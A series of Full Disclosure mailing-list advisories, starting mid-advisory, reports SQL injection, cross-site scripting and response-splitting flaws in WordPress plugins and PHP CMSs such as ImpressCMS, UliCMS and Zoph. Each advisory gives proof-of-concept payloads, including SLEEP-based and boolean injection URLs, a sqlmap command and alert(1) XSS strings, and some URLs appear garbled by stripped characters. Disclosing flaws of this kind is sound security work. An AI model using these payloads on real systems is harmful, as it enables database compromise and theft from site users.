Vendor release a new version.
https://downloads.wordpress.org/plugin/spider-event-calendar.1.5.52.zip
VIII. REFERENCES
-
https://es.wordpress.org/plugins/spider-event-calendar/
IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-
April 06, 2017 1: Initial release
April 10, 2017 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-
April 06, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
April 06, 2017 2: Send to vendor
April 07, 2017 3: Vendor fix the vulnerability and release a new version
April 10, 2017 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-
Manuel Garcia Cardenas
Pentester
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection
= MGC ALERT 2017-002 - Original release date: February 21, 2017 - Last revised: February 28, 2017 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) = I. VULNERABILITY - WordPress Plugin Kama Click Counter 3.4.9 - Blind SQL Injection II. BACKGROUND - Using this plugin you will have statistics on clicks on your files or any other link (not file). III. DESCRIPTION - This bug was found using the portal in the /wp-content/plugins/kama-clic-counter/admin.php file. In the line 172,173 do not sanitize the input values. $order_by = ($x= & $_GET['order_by']) ? esc_sql($x) : 'link_date'; $order= ($x= & $_GET['order']) ? esc_sql($x) : 'DESC'; And in the line 182 or 186 the sql sentence is executed: $sql = "SELECT * FROM $wpdb->kcc_clicks WHERE link_url LIKE '%$s%' OR link_name LIKE '%$s%' ORDER BY $order_by $order LIMIT $offset, $limit"; $sql = "SELECT * FROM $wpdb->kcc_clicks ORDER BY $order_by $order LIMIT $offset, $limit"; To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code. IV. PROOF OF CONCEPT - The following URL have been confirmed to all suffer from Time Based SQL Injection. Time Based SQL Injection POC: /wordpress/wp-admin/admin.php?page=kama-clic-counter_by=link_name=ASC%2c(select*from(select(sleep(2)))a)=1 (2 seconds of response) /wordpress/wp-admin/admin.php?page=kama-clic-counter_by=link_name=ASC%2c(select*from(select(sleep(30)))a)=1 (30 seconds of response) V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Kama Click Counter <= 3.4.9 VII. SOLUTION - Disable the plugin until a fix is available. VIII. REFERENCES - https://wordpress.org/plugins-wp/kama-clic-counter/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - February 21, 2017 1: Initial release February 28, 2017 2: Revision to send to lists XI. DISCLOSURE TIMELINE - February 21, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas February 21, 2017 2: Send to vendor February 24, 2017 3: New contact with vendor without response February 28, 2017 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WordPress Plugin Easy Table 1.6 - Persistent Cross-Site Scripting
= MGC ALERT 2017-001 - Original release date: Feb 07, 2017 - Last revised: Feb 12, 2017 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) = I. VULNERABILITY - WordPress Plugin Easy Table 1.6 - Persistent Cross-Site Scripting II. BACKGROUND - Easy Table is a WordPress plugin that allow you to insert table in easy way. III. DESCRIPTION - Has been detected a Persistent XSS vulnerability in Easy Table, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - Malicious Request: /wordpress/wp-admin/options-general.php?page=easy-table easy_table_plugin_option[shortcodetag] easy_table_plugin_option[attrtag] easy_table_plugin_option[class] easy_table_plugin_option[width] easy_table_plugin_option[border] easy_table_plugin_option[align] easy_table_plugin_option[limit] easy_table_plugin_option[nl] easy_table_plugin_option[terminator] easy_table_plugin_option[delimiter] easy_table_plugin_option[escape] In all of this parameters an attacker can inject for example ">alert(1) to perform a attack of Persistent Cross-Site Scripting. V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - Easy Table <= 1.6 VII. SOLUTION - Disable the plugin until a fix is available. VIII. REFERENCES - https://wordpress.org/plugins-wp/easy-table/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - Feb 07, 2017 1: Initial release Feb 12, 2017 2: Last revision XI. DISCLOSURE TIMELINE - Feb 07, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas Feb 07, 2017 2: Send to vendor Feb 09, 2017 3: New contact with vendor without response Feb 12, 2017 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT --------- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Blind SQL Injection PivotX <= v2.3.11
= MGC ALERT 2016-003 - Original release date: April 14, 2016 - Last revised: July 14, 2016 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) = I. VULNERABILITY - Blind SQL Injection PivotX <= v2.3.11 II. BACKGROUND - PivotX is an open source blog software written in PHP using either flat files or a database to store content. It uses the Smarty web template system and the TinyMCE editor. III. DESCRIPTION - This bug was found using the portal with authentication as administrator. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code in the variable "del" on the page "/pivotx/pivotx/index.php". IV. PROOF OF CONCEPT - The following URL's and parameters have been confirmed to all suffer from Blind SQL injection. /pivotx/pivotx/index.php?page=comments=1=1+AND+1=1 /pivotx/pivotx/index.php?page=comments=1=1+AND+1=0 V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - PivotX <= v2.3.11 VII. SOLUTION - Vendor fix the vulnerability: https://sourceforge.net/p/pivot-weblog/code/4474/ VIII. REFERENCES - http://pivotx.net/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - April 14, 2016 1: Initial release April 22, 2016 2: Revision to send to lists XI. DISCLOSURE TIMELINE - April 14, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas April 14, 2016 2: Send to vendor April 26, 2016 3: Vendor fix vulnerability July 14, 2016 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ----- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] XSS in CMSimple <= v4.6.2
= MGC ALERT 2016-004 - Original release date: May 28, 2016 - Last revised: June 1, 2016 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) = I. VULNERABILITY - Reflected XSS in CMSimple <= v4.6.2 II. BACKGROUND - CMSimple is a php based Content Managemant System (CMS) , which requires no database. All data are stored in a simple file system. III. DESCRIPTION - Has been detected a reflected XSS vulnerability in Admin Panel of CMSimple, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. The code injection is done through the parameter "subdir" in the page "userfiles". IV. PROOF OF CONCEPT - Malicious Request: /cmsimple/?userfiles=userfiles/ Example: /cmsimple/?userfiles=userfiles/alert(1) V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - CMSimple <= v4.6.2 VII. SOLUTION - Update to version 4.6.3 VIII. REFERENCES - http://www.cmsimple.org/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - May 28, 2016 1: Initial release June 1, 2016 2: Last revision XI. DISCLOSURE TIMELINE - May 28, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas May 28, 2016 2: Send to vendor May 30, 2016 3: New version that includes patched code http://cmsimple.org/downloadcounter/dlcount/count.php?id=31 June 1, 2016 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ----- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9
=
MGC ALERT 2016-002
- Original release date: April 8, 2016
- Last revised: April 21, 2016
- Discovered by: Manuel García Cárdenas
- Severity: 7,1/10 (CVSS Base Score)
=
I. VULNERABILITY
-
Time-based SQL Injection in Admin panel ImpressCMS <= v1.3.9
II. BACKGROUND
-
ImpressCMS is a community developed Content Management System for easily
building and maintaining a dynamic web site.
III. DESCRIPTION
-
This bug was found using the portal with authentication as administrator.
To exploit the vulnerability only is needed use the version 1.0 of the HTTP
protocol to interact with the application.
It is possible to inject SQL code in the variable
"quicksearch_mod_profile_Field" on the page
"/modules/profile/admin/field.php".
IV. PROOF OF CONCEPT
-
The following URL's and parameters have been confirmed to all suffer from
Time Based Blind SQL injection.
quicksearch_mod_profile_Field=') AND (SELECT * FROM
(SELECT(SLEEP(1)))IRLV) AND ('DhUh' LIKE
'DhUh_quicksearch_mod_profile_Field=Search=default=15
quicksearch_mod_profile_Field=') AND (SELECT * FROM
(SELECT(SLEEP(5)))IRLV) AND ('DhUh' LIKE
'DhUh_quicksearch_mod_profile_Field=Search=default=15
V. BUSINESS IMPACT
-
Public defacement, confidential data leakage, and database server
compromise can result from these attacks. Client systems can also be
targeted, and complete compromise of these client systems is also possible.
VI. SYSTEMS AFFECTED
-
ImpressCMS <= v1.3.9
VII. SOLUTION
-
Install vendor patch.
VIII. REFERENCES
-
http://www.impresscms.org/
IX. CREDITS
-
This vulnerability has been discovered and reported
by Manuel García Cárdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-
April 8, 2016 1: Initial release
April 21, 2016 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-
April 8, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas
April 8, 2016 2: Send to vendor
April 15, 2016 3: New contact to vendor with no response
April 21, 2016 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-----
Manuel Garcia Cardenas
Pentester
___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Time-based SQL Injection in Admin panel UliCMS <= v9.8.1
= MGC ALERT 2016-001 - Original release date: January 26, 2016 - Last revised: February 02, 2016 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) = I. VULNERABILITY - Time-based SQL Injection in Admin panel UliCMS <= v9.8.1 II. BACKGROUND - UliCMS is a modern web content management solution from Germany, that attempts to make web content management more easier. III. DESCRIPTION - This bug was found using the portal with authentication as administrator. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code in the variable "country_blacklist" on the page "action=spam_filter". IV. PROOF OF CONCEPT - The following URL's and parameters have been confirmed to all suffer from Time Based Blind SQL injection. /ulicms/admin/?action=spam_filter (POST) spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes POC using SQLMap: sqlmap -u "http://127.0.0.1/ulicms/admin/?action=spam_filter; --cookie="SET COOKIE HERE" --data="spamfilter_enabled=yes_words_blacklist=a_blacklist=ru_spamfilter_settings=Save+Changes" -p "country_blacklist" --dbms="mysql" --dbs V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - UliCMS <= v9.8.1 VII. SOLUTION - Install vendor patch. VIII. REFERENCES - http://en.ulicms.de/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - January 26, 2016 1: Initial release February 02, 2015 2: Revision to send to lists XI. DISCLOSURE TIMELINE --------- January 26, 2016 1: Vulnerability acquired by Manuel Garcia Cardenas January 26, 2016 2: Send to vendor January 28, 2016 3: Vendor fix vulnerability February 02, 2016 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07
= MGC ALERT 2015-002 - Original release date: September 18, 2015 - Last revised: October 05, 2015 - Discovered by: Manuel García Cárdenas - Severity: 7,1/10 (CVSS Base Score) = I. VULNERABILITY - Blind SQL Injection in admin panel PHP-Fusion <= v7.02.07 II. BACKGROUND - PHP-Fusion is a lightweight open source content management system (CMS) written in PHP. III. DESCRIPTION - This bug was found using the portal with authentication as administrator. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. It is possible to inject SQL code in the variable "status" on the page "members.php". IV. PROOF OF CONCEPT - The following URL's and parameters have been confirmed to all suffer from Blind SQL injection. /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0 Exploiting with true request (with mysql5): /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0' AND substr(@@version,1,1)='5 Exploiting with false request: /phpfusion/files/administration/members.php?aid=99ad64700ec4ce10=all=0' AND substr(@@version,1,1)='4 V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - PHP-Fusion <= v7.02.07 VII. SOLUTION - All data received by the application and can be modified by the user, before making any kind of transaction with them must be validated. VIII. REFERENCES - https://www.php-fusion.co.uk/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel García Cárdenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - September 18, 2015 1: Initial release October 10, 2015 2: Revision to send to lists XI. DISCLOSURE TIMELINE - September 18, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas September 18, 2015 2: Send to vendor September 24, 2015 3: Second mail to the verdor without response October 10, 2015 4: Send to the Full-Disclosure lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT ----- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Stored XSS in 4images <= v1.7.11
= MGC ALERT 2015-001 - Original release date: September 08, 2015 - Last revised: September 24, 2015 - Discovered by: Manuel Garcia Cardenas - Severity: 4,8/10 (CVSS Base Score) = I. VULNERABILITY - Stored XSS in 4images <= v1.7.11 II. BACKGROUND - 4images is a powerful web-based image gallery management system. Features include comment system, user registration and management, password protected administration area with browser-based upload and HTML templates for page layout and design. III. DESCRIPTION - Has been detected a stored XSS vulnerability in 4images, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. The code injection is done through the parameter warning in the page categories.php parameters "cat_description". IV. PROOF OF CONCEPT - Malicious Request: http://vulnerablesite.com/4images/admin/categories.php __csrf==updatecat_id=1_name=example_description=_parent_id=0_order=5_hits=2285_viewcat=0_viewimage=0_download=2_upload=2_directupload=9_vote=0_sendpostcard=0_readcomment=0_postcomment=2 Example: http://vulnerablesite.com/4images/categories.php?cat_id=1 V. BUSINESS IMPACT - An attacker can execute arbitrary HTML or script code in a targeted user's browser, this can leverage to steal sensitive information as user credentials, personal data, etc. VI. SYSTEMS AFFECTED - 4images <= v1.7.11 VII. SOLUTION - Update to the last version. VIII. REFERENCES - http://www.4homepages.de/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - September 08, 2015 1: Initial release September 24, 2015 2: Last revision XI. DISCLOSURE TIMELINE - September 08, 2015 1: Vulnerability acquired by Manuel Garcia Cardenas September 08, 2015 2: Send to vendor September 24, 2015 3: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT --------- Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] WebsiteBaker =2.8.3 - Multiple Vulnerabilities
= MGC ALERT 2014-004 - Original release date: March 11, 2014 - Last revised: November 18, 2014 - Discovered by: Manuel Garcia Cardenas - Severity: 10/10 (CVSS Base Score) = I. VULNERABILITY - Multiple Vulnerabilities in WebsiteBaker 2.8.3 II. BACKGROUND - WebsiteBaker helps you to create the website you want: A free, easy and secure, flexible and extensible open source content management system (CMS). III. DESCRIPTION - It is possible to inject SQL code in the variable id on the page modify.php. This bug was found using the portal without authentication. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. Has been detected a reflected XSS vulnerability in WebsiteBaker, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. An input validation problem exists within WebsiteBaker which allows injecting CR (carriage return - %0D or \r) and LF (line feed - %0A or \n) characters into the server HTTP response header, resulting in a HTTP Response Splitting Vulnerability. IV. PROOF OF CONCEPT - SQL Injection: /wb/admin/pages/modify.php?page_id=1 Cross-Site Scripting GET: /wb/admin/admintools/tool.php?tool=captcha_control6d442scriptalert(1)/script8e3b12642a8=1 /wb/modules/edit_module_files.php?page_id=1mod_dir=newsedit_file=frontend.cssaction=editpage_id=1section_id=%007e393scriptalert(1)/script9f8a40a7355f9acf0 /wb/modules/news/add_post.php?page_id=1section_id=f953ascriptalert(1)/script4ddf3369c1f /wb/modules/news/modify_group.php?page_id=1section_id=%008cf03scriptalert(1)/script2680504c3ecgroup_id=62be99873b33d1d3 /wb/modules/news/modify_post.php?page_id=1section_id=%003874ascriptalert(1)/script4194d511605post_id=db89943875a2db52 /wb/modules/news/modify_settings.php?page_id=1section_id=%008b2f4scriptalert(1)/scriptbdc8b3919b5 HTTP RESPONSE SPLITTING: If you enter a valid user and password, you can inject on the headers malicious code, example. POST /wb/admin/login/index.php HTTP/1.1 Content-Length: 204 Content-Type: application/x-www-form-urlencoded Referer: http://192.168.244.129:80/wb/ Host: 127.0.0.1 Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 Accept: */* password_fieldname=password_nwh1uuwbpassword_nwh1uuwb=VALIDPASSremember=truesubmit=Entrar url=%0d%0a%20InjectedHeader:MaliciousCodeusername_fieldname=username_nwh1uuwbusername_nwh1uuwb=adminResponse You can inject a new header named: InjectedHeader:MaliciousCode because we inject a CRLF new line with %0d%0a%20. V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - WebsiteBaker = 2.8.3 VII. SOLUTION - No news releases VIII. REFERENCES - http://www.websitebaker.org IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - March 11, 2014 1: Initial release XI. DISCLOSURE TIMELINE - March 11, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas March 11, 2014 2: Send to vendor June 05, 2014 3: Second mail to the verdor without response November 18, 2014 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
[FD] Zoph = 0.9.1 - Multiple Vulnerabilities
= MGC ALERT 2014-005 - Original release date: March 5, 2014 - Last revised: November 18, 2014 - Discovered by: Manuel Garcia Cardenas - Severity: 10/10 (CVSS Base Score) = I. VULNERABILITY - Multiple Vulnerabilities in Zoph = 0.9.1 II. BACKGROUND - Zoph (Zoph Organizes Photos) is a web based digital image presentation and management system. In other words, a photo album. It is built with PHP, MySQL and Perl. III. DESCRIPTION - It is possible to inject SQL code in the variables id and action on the pages group, photos and user. This bug was found using the portal with authentication. To exploit the vulnerability only is needed use the version 1.0 of the HTTP protocol to interact with the application. Has been detected a reflected XSS vulnerability in Zoph, that allows the execution of arbitrary HTML/script code to be executed in the context of the victim user's browser. IV. PROOF OF CONCEPT - SQL Injection: /zoph/php/group.php?_action=1'%22_clear_crumbs=1 /zoph/php/photos.php?location_id=1'%22 /zoph/php/user.php?user_id=_action=1'%22 Cross-Site Scripting GET: /zoph/php/edit_photos.php?photographer_id=3scriptalert(1)/script /zoph/php/edit_photos.php?album_id=2_crumb=3scriptalert(1)/script V. BUSINESS IMPACT - Public defacement, confidential data leakage, and database server compromise can result from these attacks. Client systems can also be targeted, and complete compromise of these client systems is also possible. VI. SYSTEMS AFFECTED - Zoph = 0.9.1 VII. SOLUTION - No news releases VIII. REFERENCES - http://www.zoph.org/ IX. CREDITS - This vulnerability has been discovered and reported by Manuel Garcia Cardenas (advidsec (at) gmail (dot) com). X. REVISION HISTORY - March 11, 2014 1: Initial release XI. DISCLOSURE TIMELINE - March 5, 2014 1: Vulnerability acquired by Manuel Garcia Cardenas March 5, 2014 2: Send to vendor June 17, 2014 3: Second mail to the verdor without response November 18, 2014 4: Sent to lists XII. LEGAL NOTICES - The information contained within this advisory is supplied as-is with no warranties or guarantees of fitness of use or otherwise. XIII. ABOUT - Manuel Garcia Cardenas Pentester ___ Sent through the Full Disclosure mailing list http://nmap.org/mailman/listinfo/fulldisclosure Web Archives RSS: http://seclists.org/fulldisclosure/
